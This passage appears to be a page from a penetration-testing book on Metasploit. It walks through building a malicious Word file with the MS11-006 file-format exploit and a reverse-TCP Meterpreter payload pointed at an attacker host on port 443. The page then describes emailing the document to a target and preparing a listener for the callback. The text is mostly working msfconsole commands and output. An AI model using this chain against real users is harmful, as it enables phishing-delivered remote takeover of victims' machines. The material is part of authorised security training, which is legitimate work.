120
Chapter 8
available. In the next example, you can see that the file format is exported as
a document:
msf >
use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) >
info
. . . SNIP . . .
Available targets:
Id Name
-- ----
0 Automatic
1 Windows 2000 SP0/SP4 English
2 Windows XP SP3 English
3 Crash Target for Debugging
Next, you can see that we have a few targets available to use, but we’ll
make it automatic and leave everything at the default settings:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
OUTPUTPATH /opt/metasploit3/msf3/data/exploits yes The location of the file.
We’ll need to set a payload as usual. In this case, we will select our first
choice, a reverse Meterpreter shell:
msf exploit(ms11_006_createsizeddibsection) >
set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) >
set LHOST 172.16.32.128
LHOST => 172.16.32.128
smsf exploit(ms11_006_createsizeddibsection) >
set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) >
exploit
[*] Creating 'msf.doc' file...
[*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) >
Sending the Payload
Our file was exported as
msf.doc
and sent to the
/opt/
directory within
Metasploit. Now that we have our malicious document, we can craft up an
email to our target and hope the user opens it. At this point, we should
already have an idea of the target’s patch levels and vulnerabilities. Before
we actually open the document, we need to set up a multi-handler listener.
This will ensure that when the exploit is triggered, the attacker machine can
receive the connection back from the target machine (reverse payload).